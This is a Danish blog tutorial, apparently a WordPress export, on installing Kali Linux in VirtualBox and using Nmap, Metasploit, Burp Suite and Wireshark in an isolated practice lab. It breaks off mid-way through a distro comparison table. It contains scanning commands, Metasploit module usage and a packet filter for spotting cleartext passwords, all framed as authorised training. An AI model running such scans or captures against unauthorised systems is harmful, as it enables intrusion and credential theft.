{"id":136,"date":"2026-06-19T16:40:34","date_gmt":"2026-06-19T16:40:34","guid":{"rendered":"https:\/\/shattered.io\/dk\/2026\/06\/19\/kali-linux-penetrationstest-2026\/"},"modified":"2026-06-19T16:42:03","modified_gmt":"2026-06-19T16:42:03","slug":"kali-linux-penetrationstest-2026","status":"publish","type":"post","link":"https:\/\/shattered.io\/dk\/kali-linux-penetrationstest-2026\/","title":{"rendered":"Kali Linux: Installation og Penetrationstest i 12 Trin [2026]"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Kali Linux er det foretrukne operativsystem for professionelle penetrationstestere, sikkerhedsforskere og etiske hackere verden over. Med over 600 forudinstallerede sikkerhedsv\u00e6rkt\u00f8jer giver det adgang til alt fra netv\u00e6rksskanning til password-cracking i en enkelt distribution. Denne guide viser dig, hvordan du installerer og bruger Kali Linux sikkert og lovligt, trin for trin.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">NIS2-direktivet, som tr\u00e5dte i kraft for danske virksomheder i 2024, kr\u00e6ver at kritiske infrastrukturvirksomheder dokumenterer deres sikkerhedstestning. Kali Linux er et af de godkendte v\u00e6rkt\u00f8jer til autoriserede penetrationstests. Guiden d\u00e6kker installation i VirtualBox, de 10 vigtigste v\u00e6rkt\u00f8jer med konkrete kommandoeksempler og ops\u00e6tning af et lovligt \u00f8velsesmilj\u00f8.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"hvad-er-kali-linux\">Hvad er Kali Linux?<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Kali Linux er en Debian-baseret Linux-distribution udviklet og vedligeholdt af Offensive Security. Den er specifikt designet til digitalt retsmedicin og penetrationstestning. Distributionen indeholder over 600 forudinstallerede sikkerhedsv\u00e6rkt\u00f8jer organiseret i kategorier som netv\u00e6rksanalyse, web-applikationstestning, tr\u00e5dl\u00f8s sikkerhed og kodeords-revision.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Den seneste stabile version er <strong>Kali Linux 2025.1<\/strong>, udgivet i begyndelsen af 2025, med kernel 6.12.0. Distributionen opdateres kvartalsm\u00e6ssigt med nye v\u00e6rkt\u00f8jer og sikkerhedsopdateringer. Kali Linux er gratis og open source, finansieret af Offensive Security, som ogs\u00e5 udgiver OSCP-certificeringen, der er industristandardet for penetrationstestere.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">I mods\u00e6tning til en standard Ubuntu- eller Debian-installation er Kali Linux <strong>ikke egnet til daglig brug<\/strong> p\u00e5 din prim\u00e6re computer. Det er et specialiseret testmilj\u00f8, der k\u00f8rer bedst i en virtuel maskine isoleret fra dit produktionssystem og hjemmenetv\u00e6rk.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Kali Linux adskiller sig fra generelle Linux-distributioner p\u00e5 tre vigtige punkter. Tjenesterne er som standard deaktiveret ved opstart for at reducere angrebsfladen. Netv\u00e6rkspakker kompileres med patches til pakke-injektion, der er n\u00f8dvendige for tr\u00e5dl\u00f8s sikkerhedstest. Kernels og drivers er tilpasset til underst\u00f8ttelse af specifikt sikkerhedshardware som bestemte USB WiFi-adaptere.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"forudsaetninger-og-systemkrav\">Foruds\u00e6tninger og systemkrav<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Inden du installerer Kali Linux, skal du sikre dig at dit hostsystem opfylder kravene. F\u00f8lgende tabel viser minimums- og anbefalede specifikationer baseret p\u00e5 officielle Kali Linux-dokumentation og praktisk erfaring fra sikkerhedsprofessionelle.<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Komponent<\/th><th>Minimum<\/th><th>Anbefalet<\/th><th>Optimalt til Metasploit\/Burp<\/th><\/tr><\/thead><tbody><tr><td>RAM (Host-system i alt)<\/td><td>4 GB<\/td><td>8 GB<\/td><td>16 GB eller mere<\/td><\/tr><tr><td>RAM (tildelt VM)<\/td><td>2 GB<\/td><td>4 GB<\/td><td>8 GB<\/td><\/tr><tr><td>CPU<\/td><td>Dual-core 2 GHz med VT-x\/AMD-V<\/td><td>Quad-core<\/td><td>8-core<\/td><\/tr><tr><td>Diskplads til VM<\/td><td>20 GB<\/td><td>40 GB<\/td><td>80 GB<\/td><\/tr><tr><td>Video RAM<\/td><td>64 MB<\/td><td>128 MB<\/td><td>256 MB<\/td><\/tr><tr><td>VirtualBox-version<\/td><td>6.1<\/td><td>7.0+<\/td><td>7.0+ med Extension Pack<\/td><\/tr><tr><td>Internet<\/td><td>Kr\u00e6ves til download og opdateringer<\/td><td>Stabil 10 Mbit\/s<\/td><td>50+ Mbit\/s<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Du skal desuden have aktiveret hardware-virtualisering (Intel VT-x eller AMD-V) i din computers BIOS\/UEFI. Mange moderne computere har dette aktiveret som standard, men \u00e6ldre maskiner kr\u00e6ver manuel aktivering under opstart ved at trykke p\u00e5 F2, F10, Delete eller den relevante BIOS-tast.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"noedvendig-software-til-installationen\">N\u00f8dvendig software til installationen<\/h3>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>VirtualBox 7.0+<\/strong> fra virtualbox.org (gratis, Windows\/macOS\/Linux)<\/li><li><strong>Kali Linux ISO<\/strong> fra kali.org\/get-kali (gratis, ca. 3,9 GB download)<\/li><li><strong>VirtualBox Extension Pack<\/strong> (valgfrit, men anbefalet til USB 3.0-support)<\/li><li><strong>Tilstr\u00e6kkelig diskplads<\/strong> til VM-filen (minimum 20 GB fri plads)<\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"trin-1-download-og-verificer-kali-linux\">Trin 1: Download og verificer Kali Linux<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Download altid Kali Linux direkte fra den officielle hjemmeside p\u00e5 kali.org. Tredjeparts-downloads fra tilf\u00e6ldige hjemmesider og torrent-sider kan indeholde modificerede ISO-filer med forudinstallerede bagd\u00f8re, der kompromitterer dit system fra dag \u00e9t. Se <a href=\"https:\/\/www.kali.org\/docs\/introduction\/what-is-kali-linux\/\" target=\"_blank\" rel=\"noopener noreferrer\">Kali Linux&#8217;s officielle introduktion<\/a> for baggrund om projektet.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">G\u00e5 til kali.org\/get-kali og v\u00e6lg <strong>Installer Images<\/strong>. Hent den 64-bit Installer-version til din arkitektur (x86_64 til de fleste moderne computere). Download ogs\u00e5 SHA256-checksummen fra den samme side.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Verificer ISO-filen efter download. P\u00e5 Linux og macOS:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sha256sum kali-linux-2025.1-installer-amd64.iso<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">P\u00e5 Windows med PowerShell:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Get-FileHash kali-linux-2025.1-installer-amd64.iso -Algorithm SHA256 | Format-List<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Den returnerede hexadecimale streng skal matche SHA256-v\u00e6rdien p\u00e5 kali.org n\u00f8jagtigt. Selv \u00e9n tegn-forskel betyder at filen er korrupt eller manipuleret, og du skal downloade den igen.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"trin-2-opret-virtuel-maskine-i-virtualbox\">Trin 2: Opret virtuel maskine i VirtualBox<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u00c5bn VirtualBox og klik p\u00e5 <strong>Ny<\/strong> for at starte guiden til oprettelse af en ny virtuel maskine. Navn og type er afg\u00f8rende for at VirtualBox anvender de rigtige standardindstillinger.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Angiv disse grundindstillinger i guiden:<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li><strong>Navn:<\/strong> Kali Linux 2025<\/li><li><strong>Type:<\/strong> Linux<\/li><li><strong>Version:<\/strong> Debian (64-bit)<\/li><li><strong>RAM:<\/strong> 4096 MB (4 GB) som minimum, 8192 MB foretr\u00e6kkes<\/li><li><strong>CPU:<\/strong> 2 processorer<\/li><li><strong>Virtuelt harddisk:<\/strong> Opret ny, VDI-format, dynamisk allokeret, 40 GB<\/li><\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u00c5bn derefter VM&#8217;ens <strong>Indstillinger<\/strong> og juster disse yderligere parametre for optimal ydeevne:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Display &gt; Sk\u00e6rm &gt; Videohukommelse:<\/strong> 128 MB<\/li><li><strong>Generelt &gt; Avanceret &gt; Delt udklipsholder:<\/strong> Tovejs<\/li><li><strong>Generelt &gt; Avanceret &gt; Tr\u00e6k og slip:<\/strong> Tovejs<\/li><li><strong>Netv\u00e6rk &gt; Adapter 1:<\/strong> NAT (til selve installationen)<\/li><li><strong>Lager:<\/strong> Tilknyt den downloadede Kali ISO til det virtuelle optiske drev<\/li><\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Aktiver <strong>System &gt; Processor &gt; Aktiver PAE\/NX<\/strong> og marker <strong>Aktiver indlejret virtualisering<\/strong> hvis din CPU underst\u00f8tter det. Dette giver markant bedre ydeevne ved brug af ressourcekr\u00e6vende v\u00e6rkt\u00f8jer som Metasploit og Burp Suite.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"trin-3-installer-kali-linux\">Trin 3: Installer Kali Linux<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Start VM&#8217;en. VirtualBox booter automatisk fra den tilknyttede ISO-fil og viser Kali&#8217;s bootmenu. V\u00e6lg <strong>Graphical Install<\/strong> for den nemmeste installationsoplevelse med mus og grafisk interface. Text Install er hurtigere men kr\u00e6ver mere Linux-erfaring.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Installer-guiden gennemg\u00e5r disse konfigurationstrin i r\u00e6kkef\u00f8lge:<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li><strong>Sprog:<\/strong> V\u00e6lg Danish eller English (English anbefales for lettere adgang til engelsk dokumentation)<\/li><li><strong>Placering:<\/strong> Denmark<\/li><li><strong>Tastaturlayout:<\/strong> Danish<\/li><li><strong>Hostname:<\/strong> kali (eller et selvvalgt navn)<\/li><li><strong>Dom\u00e6nenavn:<\/strong> Lad st\u00e5 tomt til hjemmelabbrug<\/li><li><strong>Brugernavn og adgangskode:<\/strong> Opret en ikke-root bruger (fx &#8220;pentester&#8221;)<\/li><li><strong>Root-adgangskode:<\/strong> Angiv en st\u00e6rk adgangskode p\u00e5 mindst 16 tegn<\/li><li><strong>Diskpartitionering:<\/strong> Guided, brug hele disken, alle filer i \u00e9n partition<\/li><li><strong>Software-valg:<\/strong> Behold standardvalg (inkluderer GNOME-skrivebord og standard sikkerhedsv\u00e6rkt\u00f8jer)<\/li><li><strong>GRUB-bootloader:<\/strong> Ja, installer p\u00e5 den virtuelle disk (\/dev\/sda)<\/li><\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Installationen tager typisk 15-25 minutter afh\u00e6ngigt af din computers hastighed. N\u00e5r den er f\u00e6rdig, fjerner VirtualBox automatisk ISO-filen og genstarter i det nyinstallerede Kali Linux-system.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"trin-4-foerste-opstart-og-konfiguration\">Trin 4: F\u00f8rste opstart og konfiguration<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Log ind med det brugernavn og den adgangskode du oprettede under installationen. Det er god sikkerhedspraksis at undg\u00e5 at logge direkte ind som root til daglig brug. Kali Linux er konfigureret til at give dig sudo-adgang til administrative opgaver, pr\u00e6cis som en standard Ubuntu-installation.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00c5bn en terminal og verificer installationen med:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cat \/etc\/os-release<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Forventet output:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>PRETTY_NAME=\"Kali GNU\/Linux Rolling\"\nNAME=\"Kali GNU\/Linux\"\nID=kali\nVERSION=\"2025.1\"\nID_LIKE=debian\nHOME_URL=\"https:\/\/www.kali.org\/\"\nSUPPORT_URL=\"https:\/\/forums.kali.org\/\"\nBUG_REPORT_URL=\"https:\/\/bugs.kali.org\/\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Installer VirtualBox Guest Additions for bedre sk\u00e6rmopl\u00f8sning og deling af udklipsholder. I VirtualBox-menuen v\u00e6lger du <strong>Enheder &gt; Inds\u00e6t Guest Additions CD-billede<\/strong>, \u00e5bner en terminal og k\u00f8rer:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo apt update\nsudo apt install -y virtualbox-guest-x11\nsudo reboot<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Efter genstart kan du justere sk\u00e6rmopl\u00f8sningen til din monitors native opl\u00f8sning via <strong>Sk\u00e6rmindstillinger<\/strong> i GNOME.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"trin-5-opdater-systemet-korrekt\">Trin 5: Opdater systemet korrekt<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Kali Linux bruger en rolling release-model, hvilket betyder at der l\u00f8bende udgives pakke-opdateringer. Det er afg\u00f8rende at opdatere systemet inden du begynder at bruge nogen af sikkerhedsv\u00e6rkt\u00f8jerne. For\u00e6ldede pakker kan give fejlagtige testresultater eller mangle moduler for de seneste kendte s\u00e5rbarheder.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">K\u00f8r den komplette opdateringssekvens:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo apt update && sudo apt full-upgrade -y && sudo apt autoremove -y<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Forventet output fra <code>apt update<\/code>:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Hit:1 http:\/\/http.kali.org\/kali kali-rolling InRelease\nReading package lists... Done\nBuilding dependency tree... Done\nReading state information... Done\n245 packages can be upgraded.\nRun 'apt list --upgradable' to see them.<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Opdateringen kan tage 10-30 minutter afh\u00e6ngigt af antallet af tilg\u00e6ngelige opdateringer og din internetforbindelses hastighed. Genstart efterf\u00f8lgende med <code>sudo reboot<\/code>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Tag et VirtualBox-snapshot af din opdaterede, rene Kali-installation inden du forts\u00e6tter. G\u00e5 til <strong>Maskine &gt; Tag snapshot<\/strong> og navngiv det &#8220;Kali 2025.1 Ren installation&#8221;. Dette er dit fikspunkt, du kan vende tilbage til efter eksperimenter.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"trin-6-nmap-til-netvaerksskanning\">Trin 6: Nmap til netv\u00e6rksskanning<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Nmap (Network Mapper) er det mest anvendte netv\u00e6rksskanningsv\u00e6rkt\u00f8j i cybersikkerhedsverdenen og det f\u00f8rste v\u00e6rkt\u00f8j en penetrationstester typisk bruger i reconnaissance-fasen. Det identificerer aktive v\u00e6rter, \u00e5bne porte og k\u00f8rende tjenester p\u00e5 et netv\u00e6rk. Den officielle dokumentation er tilg\u00e6ngelig p\u00e5 <a href=\"https:\/\/nmap.org\/docs.html\" target=\"_blank\" rel=\"noopener noreferrer\">nmap.org\/docs.html<\/a>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Verificer at Nmap er installeret og tjek versionen:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>nmap --version<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Forventet output:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Nmap version 7.95 ( https:\/\/nmap.org )\nPlatform: x86_64-pc-linux-gnu\nCompiled with: liblua-5.4.6 libpcre2-10.43 libz-1.2.13 openssl-3.2.1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">K\u00f8r grundl\u00e6ggende skanninger i dit eget testmilj\u00f8:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Hurtig skanning af localhost (altid lovlig mod din egen maskine)\nsudo nmap -sV 127.0.0.1\n\n# Host discovery p\u00e5 dit VM-netv\u00e6rk\nsudo nmap -sn 192.168.56.0\/24\n\n# Detaljeret tjeneste- og OS-detektion\nsudo nmap -A -sV -p- 192.168.56.101\n\n# Aggressiv skanning med scripts\nsudo nmap -sC -sV -O 192.168.56.101<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Forventet output fra en version-scan mod localhost:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Starting Nmap 7.95 ( https:\/\/nmap.org ) at 2026-06-19 10:00 CEST\nNmap scan report for localhost (127.0.0.1)\nHost is up (0.000010s latency).\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNmap done: 1 IP address (1 host up) scanned in 0.57 seconds<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Nmap-flaget <code>-sV<\/code> detekterer tjenesteversioner. <code>-A<\/code> aktiverer OS-detektion, versionsdetektion, script-scanning og traceroute. <code>-p-<\/code> scanner alle 65.535 TCP-porte frem for standardm\u00e6ssigt kun de 1.000 mest almindelige. Brug <code>-T4<\/code> for hurtigere scanning i et lab-milj\u00f8 (undg\u00e5 det p\u00e5 fremmede netv\u00e6rk da det efterlader tydelige spor).<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"trin-7-metasploit-framework-til-saarbarhedstest\">Trin 7: Metasploit Framework til s\u00e5rbarhedstest<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Metasploit Framework er verdens mest udbredte platform til penetrationstestning. Den inkluderer over 2.000 eksploit-moduler, payloads og hj\u00e6lpev\u00e6rkt\u00f8jer til dokumenteret s\u00e5rbarhedstest. <a href=\"https:\/\/www.offensive-security.com\/metasploit-unleashed\/\" target=\"_blank\" rel=\"noopener noreferrer\">Metasploit Unleashed<\/a> fra Offensive Security er en gratis online ressource til at l\u00e6re platformen fra bunden.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Metasploit-databasen kr\u00e6ver PostgreSQL. Initialiser databasen ved f\u00f8rste brug:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo systemctl start postgresql\nsudo msfdb init<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Start Metasploit Framework Console:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>msfconsole<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Forventet output (ASCII-banner varierer ved hver version):<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>       =[ metasploit v6.4.x-dev                          ]\n+ -- --=[ 2400 exploits - 1245 auxiliary - 421 post       ]\n+ -- --=[ 1089 payloads - 45 encoders - 11 nops           ]\n\nmsf6 ><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Vigtige grundkommandoer i Metasploit:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># S\u00f8g efter moduler relateret til et n\u00f8gleord\nmsf6 > search type:auxiliary name:scanner\n\n# Brug et hj\u00e6lpemodul til port-scanning\nmsf6 > use auxiliary\/scanner\/portscan\/tcp\nmsf6 auxiliary(scanner\/portscan\/tcp) > set RHOSTS 192.168.56.0\/24\nmsf6 auxiliary(scanner\/portscan\/tcp) > set THREADS 10\nmsf6 auxiliary(scanner\/portscan\/tcp) > run\n\n# Hent oplysninger om et modul\nmsf6 > info exploit\/multi\/handler\n\n# Opdater Metasploit-databasen med de seneste exploits\nmsf6 > msfupdate<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Brug kun Metasploit mod systemer du ejer eller har skriftlig tilladelse til at teste. I et \u00f8velsesmilj\u00f8 bruges det mod <a href=\"https:\/\/www.metasploit.com\/download\" target=\"_blank\" rel=\"noopener noreferrer\">Metasploitable<\/a>, som er en bevidst s\u00e5rbar Ubuntu-VM designet specielt til sikkerhedstr\u00e6ning.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"trin-8-burp-suite-til-web-applikationssikkerhed\">Trin 8: Burp Suite til web-applikationssikkerhed<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Burp Suite Community Edition er inkluderet i Kali Linux og er det prim\u00e6re v\u00e6rkt\u00f8j til test af web-applikationers sikkerhed. Det fungerer som en intercepterende proxy, der lader dig analysere og modificere HTTP\/HTTPS-trafik i realtid. Den fulde dokumentation og vejledninger er tilg\u00e6ngelige hos <a href=\"https:\/\/portswigger.net\/burp\/documentation\/desktop\/getting-started\" target=\"_blank\" rel=\"noopener noreferrer\">PortSwigger Academy<\/a>, som ogs\u00e5 tilbyder gratis online \u00f8velsesbaner.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Start Burp Suite:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>burpsuite &<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Konfigurer Firefox-browseren til at sende trafik igennem Burp Suite&#8217;s proxy:<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>I Burp Suite: g\u00e5 til <strong>Proxy &gt; Options<\/strong> og not\u00e9r proxy-adressen (standard: 127.0.0.1:8080)<\/li><li>I Firefox: g\u00e5 til <strong>Indstillinger &gt; Netv\u00e6rk &gt; Proxy-indstillinger<\/strong><\/li><li>V\u00e6lg <strong>Manuel proxy-konfiguration<\/strong><\/li><li>HTTP-proxy: 127.0.0.1, Port: 8080<\/li><li>\u00c5bn http:\/\/burpsuite i Firefox og download Burp&#8217;s CA-certifikat<\/li><li>Importer certifikatet i Firefox under <strong>Indstillinger &gt; Certifikater<\/strong><\/li><\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Burp Suite Community Edition er ideel til at \u00f8ve web-sikkerhedss\u00e5rbarheder mod OWASP Juice Shop, en bevidst s\u00e5rbar Node.js-applikation. Download og k\u00f8r den via Docker:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo apt install -y docker.io\nsudo systemctl start docker\nsudo docker pull bkimminich\/juice-shop\nsudo docker run -d -p 3000:3000 bkimminich\/juice-shop<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u00c5bn derefter http:\/\/localhost:3000 i Firefox med Burp som proxy. OWASP Juice Shop simulerer en fuldt fungerende webshop med over 80 bevidste sikkerhedsfejl, fra XSS til SQL-injektion til brudte adgangskontroller. Se vores artikel om <a href=\"\/sql-injection-nodejs\/\">SQL-injektion i Node.js<\/a> for at forst\u00e5 de underliggende mekanismer. Juice Shops officielle projektside er p\u00e5 <a href=\"https:\/\/owasp.org\/www-project-juice-shop\/\" target=\"_blank\" rel=\"noopener noreferrer\">OWASP.org<\/a>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"trin-9-wireshark-til-netvaerkstrafikanalyse\">Trin 9: Wireshark til netv\u00e6rkstrafikanalyse<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Wireshark er den mest udbredte netv\u00e6rksprotokol-analysator i verden og et uundv\u00e6rligt redskab til at forst\u00e5 netv\u00e6rkstrafik, diagnosticere problemer og identificere mist\u00e6nkelig kommunikation. Se den officielle dokumentation p\u00e5 <a href=\"https:\/\/www.wireshark.org\/docs\/\" target=\"_blank\" rel=\"noopener noreferrer\">wireshark.org\/docs<\/a>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Tilf\u00f8j din bruger til wireshark-gruppen for at undg\u00e5 at k\u00f8re Wireshark som root:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo usermod -aG wireshark $USER\n# Log ud og ind igen for at \u00e6ndringen tr\u00e6der i kraft\nnewgrp wireshark<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Start Wireshark og v\u00e6lg dit netv\u00e6rksinterface. Nyttige filterudtryk til sikkerhedsanalyse:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Vis kun HTTP-trafik (potentielt ukrypteret data)\nhttp\n\n# Vis trafik til og fra en specifik IP-adresse\nip.addr == 192.168.56.101\n\n# Detekter potentiel portskanning (mange SYN-pakker uden SYN-ACK)\ntcp.flags.syn == 1 and tcp.flags.ack == 0\n\n# Vis kun DNS-foresp\u00f8rgsler og -svar\ndns\n\n# Find potentielle credentials i klartekst-HTTP\nhttp contains \"password\"\n\n# Vis ARP-trafik (nyttigt til at finde enheder p\u00e5 netv\u00e6rket)\narp<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Wireshark gemmer captures i .pcap-format, som kan deles med kolleger og analyseres offline. Tcpdump er Wiresharks kommandolinjebaserede alternativ, nyttigt til at opfange trafik p\u00e5 servere uden grafisk interface:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Opfang al trafik p\u00e5 eth0 og gem til fil\nsudo tcpdump -i eth0 -w capture.pcap\n\n# Opfang kun HTTP-trafik\nsudo tcpdump -i eth0 port 80 -w http_capture.pcap<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"trin-10-opsaet-et-isoleret-oevelsesmiljoe\">Trin 10: Ops\u00e6t et isoleret \u00f8velsesmilj\u00f8<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Et korrekt konfigureret \u00f8velsesmilj\u00f8 er fundamentet for lovlig og sikker penetrationstestning. M\u00e5let er at isolere al testtrafik fra dit hjemmenetv\u00e6rk og internet, s\u00e5 dine \u00f8velser ikke ved et uheld p\u00e5virker systemer du ikke har tilladelse til at teste.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"virtualbox-host-only-netvaerkskonfiguration\">VirtualBox Host-only Netv\u00e6rkskonfiguration<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Opret et isoleret Host-only netv\u00e6rk i VirtualBox:<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>\u00c5bn VirtualBox, g\u00e5 til <strong>Filer &gt; Host Network Manager<\/strong><\/li><li>Klik <strong>Opret<\/strong> for at oprette et nyt host-only netv\u00e6rk<\/li><li>Not\u00e9r IP-adressen for host-adapteren (standard: 192.168.56.1)<\/li><li>S\u00e6t din Kali Linux VM&#8217;s netv\u00e6rksadapter til <strong>Host-only Adapter<\/strong><\/li><li>G\u00f8r det samme for din m\u00e5lmaskine (Metasploitable, DVWA eller lignende)<\/li><\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Verificer netv\u00e6rksforbindelsen i Kali:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Se netv\u00e6rksinterfaces og tildelte IP-adresser\nip a\n\n# Test forbindelsen til m\u00e5lmaskinen\nping -c 4 192.168.56.101\n\n# Verificer at internet er afsk\u00e5ret fra VM (god isolation)\nping -c 2 8.8.8.8 || echo \"Internet isoleret korrekt\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Anbefalede bevidst s\u00e5rbare \u00f8velsessystemer til din lab:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Metasploitable 2\/3:<\/strong> Klassisk Ubuntu-baseret s\u00e5rbar VM, ideel til Metasploit-\u00f8velser<\/li><li><strong>DVWA<\/strong> (Damn Vulnerable Web Application): PHP\/MySQL webapplikation til web-sikkerhedstest<\/li><li><strong>OWASP Juice Shop:<\/strong> Node.js-baseret webshop med 80+ bevidste sikkerhedsfejl<\/li><li><strong>VulnHub:<\/strong> Hundredvis af gratis CTF-lignende \u00f8velsesmaskiner, download p\u00e5 vulnhub.com<\/li><li><strong>HackTheBox og TryHackMe:<\/strong> Online platforme med styrede \u00f8velsesmilj\u00f8er via VPN<\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"kali-linux-vs-parrot-os-vs-blackarch\">Kali Linux vs Parrot OS vs BlackArch<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Der er tre prim\u00e6re sikkerhedsdistributioner som penetrationstestere bruger. Valget afh\u00e6nger af dine m\u00e5l og erfaringsniveau. For de fleste brugere er Kali Linux det klare valg, men det er v\u00e6rd at forst\u00e5 alternativerne.<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Funktion<\/th><th>Kali Linux<\/th><th>Parrot OS<\/th><th>BlackArch<\/th><\/tr><\/thead><tbody><tr><td>Base-distribution<\/td><td>Debian Testing<\/td><td>Debian Testing<\/td><td>Arch Linux<\/td><\/tr><tr><td>Forudinstallerede sikkerhedsv\u00e6rkt\u00f8jer<\/td><td>600+<\/td><td>400+<\/td><td>2.800+<\/td><\/tr><tr><td>RAM-forbrug (idle, GNOME)<\/td><td>Ca. 700 MB<\/td><td>Ca. 500 MB<\/td><td>Ca. 400 MB (minimal WM)<\/td><\/tr><tr><td>Prim\u00e6r m\u00e5lgruppe<\/td><td>Professionelle pentesters<\/td><td>Begyndere og privatlivsbrugere<\/td><td>Avancerede Arch-brugere<\/td><\/tr><tr><td>Dokumentationskvalitet<\/td><td>Fremragende (kali.org\/docs)<\/td><td>God<\/td><td>Begr\u00e6nset<\/td><\/tr><tr><td>Opdateringsmodel<\/td><td>Rolling release (kvartalsvise snapshots)<\/td><td>Rolling release<\/td><td>Rolling release<\/td><\/tr><tr><td>Community og forum<\/td><td>Meget stort, aktivt<\/td><td>Stort, venligt<\/td><td>Lille, teknisk<\/td><\/tr><tr><td>OSCP-certificering<\/td><td>Officielt anbefalet<\/td><td>Accepteret<\/td><td>Ikke anbefalet<\/td><\/tr><tr><td>Privatliv ud over 